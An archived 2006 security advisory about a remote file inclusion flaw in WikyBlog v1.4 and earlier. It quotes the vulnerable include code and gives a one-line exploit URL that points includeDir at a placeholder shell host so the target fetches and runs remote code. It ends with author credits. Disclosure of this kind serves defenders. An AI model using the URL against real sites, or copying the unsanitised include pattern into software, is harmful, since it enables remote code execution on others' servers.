WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit

2006-10-05T00:00:00
ID SECURITYVULNS:DOC:14546
Type securityvulns
Reporter Securityvulns
Modified 2006-10-05T00:00:00

Description

==============================================================================================

WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit

===============================================================================================

Bug in :index.php

Vlu Code :

--------------------------------

require_once($includeDir.'/wiki2.php');

require_once($includeDir.'/wiki3.php');

================================================================================================

Exploit :

--------------------------------

htpp://sitename.com/[scerpitPath]/index.php?includeDir=http://SHELLURL.COM

================================================================================================

Discoverd By : MoHaNdKo

Conatact : xp1o@msn.com

or

wWw.xP10.CoM & wWw.TaRyaG.CoM

Greetz : r00tshell ( abo nora ) & 3abdalah & KaBaRa & mahmood_ali & ThE-WoLf-KsA

and all member on xp10.com and tryag.com

==================================================================================================

vendor: http://puzzle.dl.sourceforge.net/sourceforge/wikyblog/WikyBlog-1.2.3.zip